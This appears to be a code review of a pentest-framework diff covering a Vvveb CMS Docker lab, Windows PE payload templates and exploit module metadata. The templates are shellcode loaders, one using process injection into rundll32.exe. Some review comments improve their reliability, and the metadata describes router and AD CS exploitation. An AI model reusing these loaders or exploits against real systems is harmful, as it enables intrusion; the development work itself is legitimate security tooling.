networks:
- vvveb-net
mysql:
image: mysql:5.7
container_name: vvveb-mysql
restart: unless-stopped
environment:
MYSQL_ROOT_PASSWORD: root
MYSQL_DATABASE: vvveb
MYSQL_USER: vvveb
MYSQL_PASSWORD: vvveb
volumes:
- db_data:/var/lib/mysql
networks:
- vvveb-net
networks:
vvveb-net:
driver: bridge
volumes:
db_data:
vvveb_html:
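Review bot: `/var/www/html` is a named volume (`vvveb_html`) that Docker seeds from the image only when the volume is first created, so rebuilding the php image with a different Vvveb release will not refresh the application files until the volume is removed; worth a comment here or a `docker compose down -v` step in the module docs. Also `mysql:5.7` is end-of-life, and the php service has no `depends_on: mysql`, so the application container can come up before the database accepts connections.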
+21
@@ -0,0 +1,21 @@
server {
listen 80;
server_name localhost;
root /var/www/html;
index index.php index.html;
location / {
try_files $uri $uri/ /index.php?$args;
}
location ~ \.php$ {
try_files $uri =404;
fastcgi_split_path_info ^(.+\.php)(/.+)$;
fastcgi_pass php:9000;
fastcgi_index index.php;
include fastcgi_params;
fastcgi_param SCRIPT_FILENAME $document_root$fastcgi_script_name;
fastcgi_param PATH_INFO $fastcgi_path_info;
}
}
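Review bot: inside `location ~ \.php$` the URI always ends in `.php`, so `fastcgi_split_path_info ^(.+\.php)(/.+)$` can never capture a trailing segment and `PATH_INFO` is always empty; either drop those two directives or, if the app needs PATH_INFO, match `\.php(/|$)` instead. Keep `try_files $uri =404` either way, since it is what rejects `/upload.jpg/x.php` style requests before they reach PHP-FPM.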
+5
@@ -0,0 +1,5 @@
display_errors = On
memory_limit = 512M
upload_max_filesize = 64M
post_max_size = 64M
max_execution_time = 300
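Review bot: `display_errors = On` surfaces file paths and stack details in responses, which is fine for this throwaway lab container but not elsewhere; a one-line comment saying the file is lab-only would stop it being copied into a real deployment.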
+2 -2
@@ -1,8 +1,8 @@
# PE Source Code
This directory contains the source code for the PE executable templates.
## Building DLLs
Use the provided `build_dlls.bat` file, and run it from within the Visual Studio
## Building
Use the provided `build_all.bat` file, and run it from within the Visual Studio
developer console. The batch file requires that the `%VCINSTALLDIR%` environment
variable be defined (which it should be by default). The build script will
create both the x86 and x64 templates before moving them into the correct
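Review bot: the README now points at `build_all.bat` but omits the prerequisite that the DLL build script documents in its `rem` line: the mixed-mode DLL links `mscoree.lib`, which needs the .NET SDK component of Visual Studio installed; add that next to the `%VCINSTALLDIR%` requirement.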
+17
@@ -0,0 +1,17 @@
@echo off
echo Compiling DLLs
for /D %%d in (dll*) do (
pushd "%%d"
call build.bat
popd
)
echo Compiling EXEs
for /D %%e in (exe*) do (
pushd "%%e"
call build.bat
popd
)
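Review bot: both loops `call build.bat` for each `dll*` and `exe*` directory but ignore the result, so a failing compile in one template neither stops the run nor changes the exit status; add `if errorlevel 1 exit /b 1` after each `call`. Note that the per-directory exe script ends with `del` and `move`, so the last errorlevel it leaves behind is that of `move`, not `cl`; the check is best placed inside those scripts right after the `cl` line. Using `call` does fix the old `build_dlls.bat`, which invoked `build.bat` directly and therefore never returned to the loop after the first directory.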
-7
@@ -1,7 +0,0 @@
@echo off
for /D %%d in (dll*) do (
pushd "%%d"
build.bat
popd
)
@@ -3,6 +3,7 @@
if "%~1"=="" GOTO NO_ARGUMENTS
echo Compiling for: %1
call "%VCINSTALLDIR%Auxiliary\Build\vcvarsall.bat" %1
rem mscoree.lib requires .NET SDK to be installed, add it as a Visual Studio component
cl /CLR /LD /GS- /I ..\dll /DBUILDMODE=2 template.cpp /Fe:template_%1_windows_mixed_mode.dll /link mscoree.lib kernel32.lib /entry:DllMain /subsystem:WINDOWS
cl /CLR /LD /GS- /I ..\dll /DBUILDMODE=2 /DSCSIZE=262144 template.cpp /Fe:template_%1_windows_mixed_mode.256kib.dll /link mscoree.lib kernel32.lib /entry:DllMain /subsystem:WINDOWS
exit /B
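Review bot: the new 256 KiB variant relies on `/DSCSIZE=262144` overriding the template's default, which only works if `template.cpp` guards that default with `#ifndef SCSIZE`. The C templates in this PR define it unconditionally (`#define SCSIZE 8192`, `#define SCSIZE 4096`), which would raise C4005 macro redefinition and keep the in-file value if the same switch were applied to them; guard all of them so the command-line size wins.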
+13
@@ -0,0 +1,13 @@
@echo off
if "%~1"=="" GOTO NO_ARGUMENTS
echo Compiling for: %1
call "%VCINSTALLDIR%Auxiliary\Build\vcvarsall.bat" %1
cl /GS- template.c /Fe:template_%1_windows.exe /link kernel32.lib /entry:main /subsystem:WINDOWS /NODEFAULTLIB
exit /B
:NO_ARGUMENTS
%COMSPEC% /c "%0" x86
%COMSPEC% /c "%0" x64
del *.obj *.res
move *.exe ..\..\..
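Review bot: `/NODEFAULTLIB` together with `/entry:main` means no CRT is linked, which is why `/GS-` is mandatory here (the `/GS` prologue references `__security_check_cookie` from the CRT) and why the template cannot use `memset`-based helpers; a `rem` line stating that dependency, as the DLL script does for `mscoree.lib`, would save the next person an unresolved-symbol error.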
@@ -1,26 +0,0 @@
Microsoft Visual Studio Solution File, Format Version 10.00
# Visual C++ Express 2008
Project("{8BC9CEB8-8B4A-11D0-8D11-00A0C91BC942}") = "service", "service.vcproj", "{BED052CD-AD84-45E2-9F9D-2C1D8FE4813F}"
EndProject
Global
GlobalSection(SolutionConfigurationPlatforms) = preSolution
Release|Win32 = Release|Win32
Release|x64 = Release|x64
Debug|Win32 = Debug|Win32
Debug|x64 = Debug|x64
EndGlobalSection
GlobalSection(ProjectConfigurationPlatforms) = postSolution
{BED052CD-AD84-45E2-9F9D-2C1D8FE4813F}.Release|Win32.ActiveCfg = Release|Win32
{BED052CD-AD84-45E2-9F9D-2C1D8FE4813F}.Release|Win32.Build.0 = Release|Win32
{BED052CD-AD84-45E2-9F9D-2C1D8FE4813F}.Release|x64.ActiveCfg = Release|x64
{BED052CD-AD84-45E2-9F9D-2C1D8FE4813F}.Release|x64.Build.0 = Release|x64
{BED052CD-AD84-45E2-9F9D-2C1D8FE4813F}.Debug|Win32.ActiveCfg = Release|Win32
{BED052CD-AD84-45E2-9F9D-2C1D8FE4813F}.Debug|Win32.Build.0 = Release|Win32
{BED052CD-AD84-45E2-9F9D-2C1D8FE4813F}.Debug|x64.ActiveCfg = Debug|x64
{BED052CD-AD84-45E2-9F9D-2C1D8FE4813F}.Debug|x64.Build.0 = Debug|x64
EndGlobalSection
GlobalSection(SolutionProperties) = preSolution
HideSolutionNode = FALSE
EndGlobalSection
EndGlobal
@@ -1,343 +0,0 @@
<?xml version="1.0" encoding="Windows-1252"?>
<VisualStudioProject
ProjectType="Visual C++"
Version="9.00"
Name="service"
ProjectGUID="{BED052CD-AD84-45E2-9F9D-2C1D8FE4813F}"
RootNamespace="service"
Keyword="Win32Proj"
TargetFrameworkVersion="196613"
>
<Platforms>
<Platform
Name="Win32"
/>
<Platform
Name="x64"
/>
</Platforms>
<ToolFiles>
</ToolFiles>
<Configurations>
<Configuration
Name="Debug|Win32"
OutputDirectory="$(SolutionDir)$(ConfigurationName)"
IntermediateDirectory="$(ConfigurationName)"
ConfigurationType="1"
CharacterSet="1"
>
<Tool
Name="VCPreBuildEventTool"
/>
<Tool
Name="VCCustomBuildTool"
/>
<Tool
Name="VCXMLDataGeneratorTool"
/>
<Tool
Name="VCWebServiceProxyGeneratorTool"
/>
<Tool
Name="VCMIDLTool"
/>
<Tool
Name="VCCLCompilerTool"
Optimization="0"
PreprocessorDefinitions="WIN32;_DEBUG;_WINDOWS"
MinimalRebuild="true"
BasicRuntimeChecks="3"
RuntimeLibrary="3"
UsePrecompiledHeader="0"
WarningLevel="3"
DebugInformationFormat="4"
/>
<Tool
Name="VCManagedResourceCompilerTool"
/>
<Tool
Name="VCResourceCompilerTool"
/>
<Tool
Name="VCPreLinkEventTool"
/>
<Tool
Name="VCLinkerTool"
LinkIncremental="2"
GenerateDebugInformation="true"
SubSystem="2"
TargetMachine="1"
/>
<Tool
Name="VCALinkTool"
/>
<Tool
Name="VCManifestTool"
/>
<Tool
Name="VCXDCMakeTool"
/>
<Tool
Name="VCBscMakeTool"
/>
<Tool
Name="VCFxCopTool"
/>
<Tool
Name="VCAppVerifierTool"
/>
<Tool
Name="VCPostBuildEventTool"
/>
</Configuration>
<Configuration
Name="Debug|x64"
OutputDirectory="$(SolutionDir)$(PlatformName)\$(ConfigurationName)"
IntermediateDirectory="$(PlatformName)\$(ConfigurationName)"
ConfigurationType="1"
CharacterSet="1"
>
<Tool
Name="VCPreBuildEventTool"
/>
<Tool
Name="VCCustomBuildTool"
/>
<Tool
Name="VCXMLDataGeneratorTool"
/>
<Tool
Name="VCWebServiceProxyGeneratorTool"
/>
<Tool
Name="VCMIDLTool"
TargetEnvironment="3"
/>
<Tool
Name="VCCLCompilerTool"
Optimization="0"
PreprocessorDefinitions="WIN32;_DEBUG;_WINDOWS"
MinimalRebuild="true"
BasicRuntimeChecks="3"
RuntimeLibrary="3"
UsePrecompiledHeader="0"
WarningLevel="3"
DebugInformationFormat="3"
/>
<Tool
Name="VCManagedResourceCompilerTool"
/>
<Tool
Name="VCResourceCompilerTool"
/>
<Tool
Name="VCPreLinkEventTool"
/>
<Tool
Name="VCLinkerTool"
LinkIncremental="2"
GenerateDebugInformation="true"
SubSystem="2"
TargetMachine="17"
/>
<Tool
Name="VCALinkTool"
/>
<Tool
Name="VCManifestTool"
/>
<Tool
Name="VCXDCMakeTool"
/>
<Tool
Name="VCBscMakeTool"
/>
<Tool
Name="VCFxCopTool"
/>
<Tool
Name="VCAppVerifierTool"
/>
<Tool
Name="VCPostBuildEventTool"
/>
</Configuration>
<Configuration
Name="Release|Win32"
OutputDirectory="$(SolutionDir)$(ConfigurationName)"
IntermediateDirectory="$(ConfigurationName)"
ConfigurationType="1"
CharacterSet="2"
WholeProgramOptimization="1"
>
<Tool
Name="VCPreBuildEventTool"
/>
<Tool
Name="VCCustomBuildTool"
/>
<Tool
Name="VCXMLDataGeneratorTool"
/>
<Tool
Name="VCWebServiceProxyGeneratorTool"
/>
<Tool
Name="VCMIDLTool"
/>
<Tool
Name="VCCLCompilerTool"
Optimization="1"
EnableIntrinsicFunctions="true"
FavorSizeOrSpeed="2"
PreprocessorDefinitions="WIN32;NDEBUG;_WINDOWS"
RuntimeLibrary="0"
BufferSecurityCheck="false"
EnableFunctionLevelLinking="true"
UsePrecompiledHeader="0"
WarningLevel="3"
DebugInformationFormat="3"
CallingConvention="2"
CompileAs="1"
/>
<Tool
Name="VCManagedResourceCompilerTool"
/>
<Tool
Name="VCResourceCompilerTool"
/>
<Tool
Name="VCPreLinkEventTool"
/>
<Tool
Name="VCLinkerTool"
OutputFile="../../../../service.exe"
LinkIncremental="1"
GenerateManifest="false"
GenerateDebugInformation="false"
SubSystem="2"
OptimizeReferences="2"
EnableCOMDATFolding="2"
TargetMachine="1"
/>
<Tool
Name="VCALinkTool"
/>
<Tool
Name="VCManifestTool"
/>
<Tool
Name="VCXDCMakeTool"
/>
<Tool
Name="VCBscMakeTool"
/>
<Tool
Name="VCFxCopTool"
/>
<Tool
Name="VCAppVerifierTool"
/>
<Tool
Name="VCPostBuildEventTool"
/>
</Configuration>
<Configuration
Name="Release|x64"
OutputDirectory="$(SolutionDir)$(PlatformName)\$(ConfigurationName)"
IntermediateDirectory="$(PlatformName)\$(ConfigurationName)"
ConfigurationType="1"
CharacterSet="2"
WholeProgramOptimization="1"
>
<Tool
Name="VCPreBuildEventTool"
/>
<Tool
Name="VCCustomBuildTool"
/>
<Tool
Name="VCXMLDataGeneratorTool"
/>
<Tool
Name="VCWebServiceProxyGeneratorTool"
/>
<Tool
Name="VCMIDLTool"
TargetEnvironment="3"
/>
<Tool
Name="VCCLCompilerTool"
Optimization="1"
EnableIntrinsicFunctions="true"
FavorSizeOrSpeed="2"
PreprocessorDefinitions="WIN32;NDEBUG;_WINDOWS"
RuntimeLibrary="0"
BufferSecurityCheck="false"
EnableFunctionLevelLinking="true"
UsePrecompiledHeader="0"
WarningLevel="3"
DebugInformationFormat="3"
CallingConvention="2"
CompileAs="1"
/>
<Tool
Name="VCManagedResourceCompilerTool"
/>
<Tool
Name="VCResourceCompilerTool"
/>
<Tool
Name="VCPreLinkEventTool"
/>
<Tool
Name="VCLinkerTool"
OutputFile="../../../../template_x64_windows_svc.exe"
LinkIncremental="1"
GenerateManifest="false"
GenerateDebugInformation="false"
SubSystem="2"
OptimizeReferences="2"
EnableCOMDATFolding="2"
TargetMachine="17"
/>
<Tool
Name="VCALinkTool"
/>
<Tool
Name="VCManifestTool"
/>
<Tool
Name="VCXDCMakeTool"
/>
<Tool
Name="VCBscMakeTool"
/>
<Tool
Name="VCFxCopTool"
/>
<Tool
Name="VCAppVerifierTool"
/>
<Tool
Name="VCPostBuildEventTool"
/>
</Configuration>
</Configurations>
<References>
</References>
<Files>
<Filter
Name="Source Files"
Filter="cpp;c;cc;cxx;def;odl;idl;hpj;bat;asm;asmx"
UniqueIdentifier="{4FC737F1-C7A5-4376-A066-2A32D752A2FF}"
>
<File
RelativePath=".\service.c"
>
</File>
</Filter>
</Files>
<Globals>
</Globals>
</VisualStudioProject>
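Review bot: settings from the removed project that the new batch file does not carry over: `Optimization="1"` (/O1), `OptimizeReferences="2"` (/OPT:REF), `EnableCOMDATFolding="2"` (/OPT:ICF) and `GenerateManifest="false"`; these only affect template size, but if the size matters for how the payload is patched in, pass them explicitly. The removed Release|Win32 config also named its output `service.exe` while x64 produced `template_x64_windows_svc.exe`; the uniform `template_%1_windows_svc.exe` in the batch file fixes that inconsistency.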
+7 -7
@@ -1,11 +1,11 @@
#include <stdio.h>
#include <windows.h>
#define SCSIZE 4096
char payload[SCSIZE] = "PAYLOAD:";
char bPayload[SCSIZE] = "PAYLOAD:";
char comment[512] = "";
int main(int argc, char **argv) {
(*(void (*)()) payload)();
return(0);
void main() {
DWORD dwOldProtect;
VirtualProtect(bPayload, SCSIZE, PAGE_EXECUTE_READWRITE, &dwOldProtect);
(*(void (*)()) bPayload)();
return;
}
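Review bot: the `VirtualProtect` return value is ignored, so if the call fails (for example under a dynamic-code mitigation that forbids RWX pages) execution still jumps into a non-executable `bPayload` and the process dies with an access violation; check the result and call `ExitProcess` on failure. Because the binary is linked with `/NODEFAULTLIB`, `void main()` is the raw entry point, and returning from it ends only the primary thread rather than the process, so finish with `ExitProcess(0)` as the service template does. `#include <stdio.h>` is unused now.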
File diff suppressed because one or more lines are too long
@@ -1,32 +0,0 @@
; Author: Stephen Fewer (stephen_fewer[at]harmonysecurity[dot]com)
; Architecture: x64
;
; Assemble and link with the following command:
; "C:\Program Files\Microsoft Visual Studio 9.0\VC\bin\x86_amd64\ml64" template_x64_windows.asm /link /subsystem:windows /defaultlib:"C:\Program Files\Microsoft SDKs\Windows\v6.0A\Lib\x64\kernel32.lib" /entry:main
extrn ExitProcess : proc
extrn VirtualAlloc : proc
.code
main proc
sub rsp, 40 ;
mov r9, 40h ;
mov r8, 3000h ;
mov rdx, 4096 ;
xor rcx, rcx ;
call VirtualAlloc ; lpPayload = VirtualAlloc( NULL, 4096, MEM_COMMIT | MEM_RESERVE, PAGE_EXECUTE_READWRITE );
mov rcx, 4096 ;
mov rsi, payload ;
mov rdi, rax ;
rep movsb ; memcpy( lpPayload, payload, 4096 );
call rax ; lpPayload();
xor rcx, rcx ;
call ExitProcess ; ExitProcess( 0 );
main endp
payload proc
A byte 'PAYLOAD:'
B db 4096-8 dup ( 0 )
payload endp
end
@@ -0,0 +1,13 @@
@echo off
if "%~1"=="" GOTO NO_ARGUMENTS
echo Compiling for: %1
call "%VCINSTALLDIR%Auxiliary\Build\vcvarsall.bat" %1
cl /GS- /DBUILDMODE=2 template.c /Fe:template_%1_windows_svc.exe /link advapi32.lib kernel32.lib /entry:main /subsystem:WINDOWS /NODEFAULTLIB
exit /B
:NO_ARGUMENTS
%COMSPEC% /c "%0" x86
%COMSPEC% /c "%0" x64
del *.obj *.res
move *.exe ..\..\..
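Review bot: the removed .vcproj compiled with `CallingConvention="2"` (/Gz, __stdcall as the default); this script drops it, and the hunk context shows `VOID ServiceMain( DWORD dwNumServicesArgs, LPSTR * lpServiceArgVectors )` declared with no explicit convention. On the x86 build `ServiceMain` and `ServiceHandler` therefore become __cdecl while the SCM invokes them through `LPSERVICE_MAIN_FUNCTIONA`/`LPHANDLER_FUNCTION` as __stdcall; the casts in `main` hide the mismatch and the stack is corrupted when the callbacks return. Add `/Gz` here or, better, declare both functions `WINAPI`.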
@@ -1,16 +1,28 @@
#define WIN32_LEAN_AND_MEAN
#include <windows.h>
#define PAYLOAD_SIZE 8192
#define SCSIZE 8192
char cServiceName[32] = "SERVICENAME";
char bPayload[PAYLOAD_SIZE] = "PAYLOAD:";
char bPayload[SCSIZE] = "PAYLOAD:";
SERVICE_STATUS ss;
SERVICE_STATUS_HANDLE hStatus = NULL;
#if BUILDMODE == 2
/* hand-rolled bzero allows us to avoid including ms vc runtime */
void inline_bzero(void *p, size_t l)
{
BYTE *q = (BYTE *)p;
size_t x = 0;
for (x = 0; x < l; x++)
*(q++) = 0x00;
}
#endif
/*
*
*/
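Review bot: `inline_bzero` is defined only under `#if BUILDMODE == 2`, yet the three `ZeroMemory` calls in `ServiceMain` are replaced with it unconditionally, so a build without `/DBUILDMODE=2` no longer compiles; either define the helper unconditionally (it has no CRT dependency in any mode) or add an `#else` that maps it to `ZeroMemory`. Replacing `ZeroMemory` itself is correct, since it expands to `memset`, which `/NODEFAULTLIB` cannot satisfy.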
@@ -34,9 +46,9 @@ VOID ServiceMain( DWORD dwNumServicesArgs, LPSTR * lpServiceArgVectors )
PROCESS_INFORMATION pi;
LPVOID lpPayload = NULL;
ZeroMemory( &ss, sizeof(SERVICE_STATUS) );
ZeroMemory( &si, sizeof(STARTUPINFO) );
ZeroMemory( &pi, sizeof(PROCESS_INFORMATION) );
inline_bzero( &ss, sizeof(SERVICE_STATUS) );
inline_bzero( &si, sizeof(STARTUPINFO) );
inline_bzero( &pi, sizeof(PROCESS_INFORMATION) );
si.cb = sizeof(STARTUPINFO);
@@ -47,7 +59,7 @@ VOID ServiceMain( DWORD dwNumServicesArgs, LPSTR * lpServiceArgVectors )
ss.dwControlsAccepted = SERVICE_ACCEPT_STOP|SERVICE_ACCEPT_SHUTDOWN;
hStatus = RegisterServiceCtrlHandler( (LPCSTR)&cServiceName, (LPHANDLER_FUNCTION)ServiceHandler );
if ( hStatus )
{
ss.dwCurrentState = SERVICE_RUNNING;
@@ -57,30 +69,30 @@ VOID ServiceMain( DWORD dwNumServicesArgs, LPSTR * lpServiceArgVectors )
if( CreateProcess( NULL, "rundll32.exe", NULL, NULL, FALSE, CREATE_SUSPENDED, NULL, NULL, &si, &pi ) )
{
Context.ContextFlags = CONTEXT_FULL;
GetThreadContext( pi.hThread, &Context );
lpPayload = VirtualAllocEx( pi.hProcess, NULL, PAYLOAD_SIZE, MEM_COMMIT|MEM_RESERVE, PAGE_EXECUTE_READWRITE );
lpPayload = VirtualAllocEx( pi.hProcess, NULL, SCSIZE, MEM_COMMIT|MEM_RESERVE, PAGE_EXECUTE_READWRITE );
if( lpPayload )
{
WriteProcessMemory( pi.hProcess, lpPayload, &bPayload, PAYLOAD_SIZE, NULL );
WriteProcessMemory( pi.hProcess, lpPayload, &bPayload, SCSIZE, NULL );
#ifdef _WIN64
Context.Rip = (DWORD64)lpPayload;
Context.Rip = (ULONG_PTR)lpPayload;
#else
Context.Eip = (DWORD)lpPayload;
Context.Eip = (ULONG_PTR)lpPayload;
#endif
SetThreadContext( pi.hThread, &Context );
}
ResumeThread( pi.hThread );
CloseHandle( pi.hThread );
CloseHandle( pi.hProcess );
}
ServiceHandler( SERVICE_CONTROL_STOP );
ExitProcess( 0 );
}
}
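Review bot: `CreateProcess` and `VirtualAllocEx` are checked but `GetThreadContext`, `WriteProcessMemory` and `SetThreadContext` are not, and `ResumeThread` runs regardless, so a partial write or failed context update resumes `rundll32.exe` at a bad address; gate `ResumeThread` on all three succeeding and `TerminateProcess` the suspended child otherwise. The `(ULONG_PTR)` casts for `Rip`/`Eip` are fine on both targets, since `ULONG_PTR` is 32-bit on x86.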
@@ -88,12 +100,13 @@ VOID ServiceMain( DWORD dwNumServicesArgs, LPSTR * lpServiceArgVectors )
/*
*
*/
int __stdcall WinMain( HINSTANCE hInstance, HINSTANCE hPrevInstance, LPSTR lpCmdLine, int nCmdShow )
void main()
{
SERVICE_TABLE_ENTRY st[] =
{
{ (LPSTR)&cServiceName, (LPSERVICE_MAIN_FUNCTIONA)&ServiceMain },
{ NULL, NULL }
};
return StartServiceCtrlDispatcher( (SERVICE_TABLE_ENTRY *)&st );
SERVICE_TABLE_ENTRY st[] =
{
{ (LPSTR)&cServiceName, (LPSERVICE_MAIN_FUNCTIONA)&ServiceMain },
{ NULL, NULL }
};
StartServiceCtrlDispatcher( (SERVICE_TABLE_ENTRY *)&st );
return;
}
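Review bot: the `StartServiceCtrlDispatcher` result is now discarded and `main` simply returns; when the binary is launched outside the SCM the call fails immediately (ERROR_FAILED_SERVICE_CONTROLLER_CONNECT) and, with no CRT linked, returning from the entry point ends only the primary thread. Call `ExitProcess` with the outcome so the process terminates deterministically in both the success and the failure case.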
Binary file not shown.
Binary file not shown.
Binary file not shown.
Binary file not shown.
+2901 -1108
@@ -837,7 +837,7 @@
"Spencer McIntyre",
"jheysel-r7"
],
"description": "This module exploits Active Directory Certificate Services (AD CS) template misconfigurations, specifically\n ESC9, ESC10, and ESC16, by updating an LDAP object and requesting a certificate on behalf of a target user.\n The module leverages the auxiliary/admin/ldap/ldap_object_attribute module to update the LDAP object and the\n admin/ldap/shadow_credentials module to add shadow credentials for the target user. It then uses the\n admin/kerberos/get_ticket module to retrieve the NTLM hash of the target user and requests a certificate via\n MS-ICPR. The resulting certificate can be used for various operations, such as authentication.\n\n The module ensures that any changes made by the ldap_object_attribute or shadow_credentials module are\n reverted after execution to maintain system integrity.",
"description": "This module exploits Active Directory Certificate Services (AD CS) template misconfigurations, specifically\n ESC9, ESC10, and ESC16, by updating an LDAP object and requesting a certificate on behalf of a target user.\n The module leverages the auxiliary/admin/ldap/ldap_object_attribute module to update the LDAP object and the\n admin/ldap/shadow_credentials module to add shadow credentials for the target user if the target password is\n not provided. It then uses the admin/kerberos/get_ticket module to retrieve the NTLM hash of the target user\n and requests a certificate via MS-ICPR. The resulting certificate can be used for various operations, such as\n authentication.\n\n The module ensures that any changes made by the ldap_object_attribute or shadow_credentials module are\n reverted after execution to maintain system integrity.",
"references": [
"URL-https://github.com/GhostPack/Certify",
"URL-https://github.com/ly4k/Certipy",
@@ -856,7 +856,7 @@
"microsoft-ds"
],
"targets": null,
"mod_time": "2025-07-30 15:28:56 +0000",
"mod_time": "2025-10-02 18:14:00 +0000",
"path": "/modules/auxiliary/admin/dcerpc/esc_update_ldap_object.rb",
"is_install_path": true,
"ref_name": "admin/dcerpc/esc_update_ldap_object",
@@ -2125,6 +2125,7 @@
],
"description": "This module abuses the 'mimencode' binary present within\n ContentKeeper Web filtering appliances to retrieve arbitrary\n files outside of the webroot.",
"references": [
"CVE-2009-10005",
"OSVDB-54551",
"URL-http://www.aushack.com/200904-contentkeeper.txt"
],
@@ -2147,7 +2148,7 @@
"https"
],
"targets": null,
"mod_time": "2025-05-16 01:16:37 +0000",
"mod_time": "2025-10-06 17:15:11 +0000",
"path": "/modules/auxiliary/admin/http/contentkeeper_fileaccess.rb",
"is_install_path": true,
"ref_name": "admin/http/contentkeeper_fileaccess",
@@ -2179,6 +2180,7 @@
],
"description": "This module exploits an OS Command Injection vulnerability in some D-Link\n Routers like the DIR-600 rev B and the DIR-300 rev B. The vulnerability exists in\n command.php, which is accessible without authentication. This module has been\n tested with the versions DIR-600 2.14b01 and below, DIR-300 rev B 2.13 and below.\n In order to get a remote shell the telnetd could be started without any\n authentication.",
"references": [
"CVE-2013-10069",
"OSVDB-89861",
"EDB-24453",
"URL-https://eu.dlink.com/uk/en/products/dir-600-wireless-n-150-home-router",
@@ -2204,7 +2206,7 @@
"https"
],
"targets": null,
"mod_time": "2025-05-16 01:16:37 +0000",
"mod_time": "2025-10-06 17:15:11 +0000",
"path": "/modules/auxiliary/admin/http/dlink_dir_300_600_exec_noauth.rb",
"is_install_path": true,
"ref_name": "admin/http/dlink_dir_300_600_exec_noauth",
@@ -3458,6 +3460,7 @@
],
"description": "This module exploits an unauthenticated file download vulnerability\n in limesurvey between 2.0+ and 2.06+ Build 151014. The file is downloaded\n as a ZIP and unzipped automatically, thus binary files can be downloaded.",
"references": [
"CVE-2025-34120",
"URL-https://sec-consult.com/vulnerability-lab/advisory/multiple-critical-vulnerabilities-in-lime-survey/",
"URL-https://www.limesurvey.org/blog/22-security/136-limesurvey-security-advisory-10-2015",
"URL-https://github.com/LimeSurvey/LimeSurvey/compare/2.06_plus_151014...2.06_plus_151016?w=1"
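Review bot: CVE-2025-34120 is attached to a module whose description and remaining references all date the bug to 2015 (2.06+ Build 151014, the October 2015 LimeSurvey advisory, the 151014...151016 compare link). Retroactive CVE assignment for old issues does happen, but please confirm in the PR that this 2025 ID covers this specific unauthenticated file download rather than a newer LimeSurvey issue, and consider adding the confirming source as a URL reference.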
@@ -3481,7 +3484,7 @@
"https"
],
"targets": null,
"mod_time": "2025-05-16 01:16:37 +0000",
"mod_time": "2025-10-06 17:15:11 +0000",
"path": "/modules/auxiliary/admin/http/limesurvey_file_download.rb",
"is_install_path": true,
"ref_name": "admin/http/limesurvey_file_download",
@@ -3513,6 +3516,7 @@
],
"description": "Some Linksys Routers are vulnerable to an authenticated OS command injection.\n Default credentials for the web interface are admin/admin or admin/password. Since\n it is a blind os command injection vulnerability, there is no output for the\n executed command. A ping command against a controlled system for can be used for\n testing purposes.",
"references": [
"CVE-2018-3953",
"OSVDB-89912",
"BID-57760",
"EDB-24475",
@@ -3537,7 +3541,7 @@
"https"
],
"targets": null,
"mod_time": "2025-05-16 01:16:37 +0000",
"mod_time": "2025-10-06 17:15:11 +0000",
"path": "/modules/auxiliary/admin/http/linksys_e1500_e2500_exec.rb",
"is_install_path": true,
"ref_name": "admin/http/linksys_e1500_e2500_exec",
@@ -3570,6 +3574,7 @@
],
"description": "This module exploits a stack-based buffer overflow vulnerability in the WRT120N Linksys router\n to reset the password of the management interface temporarily to an empty value.\n This module has been tested successfully on a WRT120N device with firmware version\n 1.0.07.",
"references": [
"CVE-2014-125122",
"EDB-31758",
"OSVDB-103521",
"URL-https://web.archive.org/web/20210424073058/http://www.devttys0.com/2014/02/wrt120n-fprintf-stack-overflow/"
@@ -3593,7 +3598,7 @@
"https"
],
"targets": null,
"mod_time": "2025-05-16 01:16:37 +0000",
"mod_time": "2025-10-06 17:15:11 +0000",
"path": "/modules/auxiliary/admin/http/linksys_tmunblock_admin_reset_bof.rb",
"is_install_path": true,
"ref_name": "admin/http/linksys_tmunblock_admin_reset_bof",
@@ -3626,6 +3631,7 @@
],
"description": "Some Linksys Routers are vulnerable to OS Command injection.\n You will need credentials to the web interface to access the vulnerable part\n of the application.\n Default credentials are always a good starting point. admin/admin or admin\n and blank password could be a first try.\n Note: This is a blind OS command injection vulnerability. This means that\n you will not see any output of your command. Try a ping command to your\n local system and observe the packets with tcpdump (or equivalent) for a first test.\n\n Hint: To get a remote shell you could upload a netcat binary and exec it.\n WARNING: this module will overwrite network and DHCP configuration.",
"references": [
"CVE-2023-31742",
"URL-http://www.s3cur1ty.de/m1adv2013-01",
"URL-http://www.s3cur1ty.de/attacking-linksys-wrt54gl",
"EDB-24202",
@@ -3651,7 +3657,7 @@
"https"
],
"targets": null,
"mod_time": "2025-05-16 01:16:37 +0000",
"mod_time": "2025-10-06 17:15:11 +0000",
"path": "/modules/auxiliary/admin/http/linksys_wrt54gl_exec.rb",
"is_install_path": true,
"ref_name": "admin/http/linksys_wrt54gl_exec",
@@ -4145,6 +4151,7 @@
],
"description": "This module targets an authentication bypass vulnerability in the mini_http binary of several Netgear Routers\n running firmware versions prior to 1.2.0.88, 1.0.1.80, 1.1.0.110, and 1.1.0.84. The vulnerability allows\n unauthenticated attackers to reveal the password for the admin user that is used to log into the\n router's administrative portal, in plaintext.\n\n Once the password has been been obtained, the exploit enables telnet on the target router and then utiltizes\n the auxiliary/scanner/telnet/telnet_login module to log into the router using the stolen credentials of the\n admin user. This will result in the attacker obtaining a new telnet session as the \"root\" user.\n\n This vulnerability was discovered and exploited by an independent security researcher who reported it to SSD.",
"references": [
"CVE-2021-45511",
"URL-https://kb.netgear.com/000063961/Security-Advisory-for-Authentication-Bypass-Vulnerability-on-the-D7000-and-Some-Routers-PSV-2021-0133",
"URL-https://ssd-disclosure.com/ssd-advisory-netgear-d7000-authentication-bypass/"
],
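Review bot: the description carried as context here has two typos worth fixing in the module source while this entry is being touched: "Once the password has been been obtained" (duplicated "been") and "utiltizes" (should be "utilizes"). The added CVE-2021-45511 matches the Netgear PSV-2021-0133 advisory already cited, so the reference change itself looks right.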
@@ -4167,7 +4174,7 @@
"https"
],
"targets": null,
"mod_time": "2024-07-24 16:42:43 +0000",
"mod_time": "2025-10-07 14:03:32 +0000",
"path": "/modules/auxiliary/admin/http/netgear_pnpx_getsharefolderlist_auth_bypass.rb",
"is_install_path": true,
"ref_name": "admin/http/netgear_pnpx_getsharefolderlist_auth_bypass",
@@ -6073,6 +6080,7 @@
],
"description": "This module exploits an unauthenticated arbitrary wordpress options change vulnerability\n in the Automatic (wp-automatic) plugin <= 3.53.2. If WPEMAIL is provided, the administrator's email\n address will be changed. User registration is\n enabled, and default user role is set to administrator. A user is then created with\n the USER name set. A valid EMAIL is required to get the registration email (not handled in MSF).",
"references": [
"CVE-2021-4374",
"URL-https://blog.nintechnet.com/critical-vulnerability-fixed-in-wordpress-automatic-plugin/"
],
"platform": "PHP",
@@ -6094,7 +6102,7 @@
"https"
],
"targets": null,
"mod_time": "2022-10-03 19:50:04 +0000",
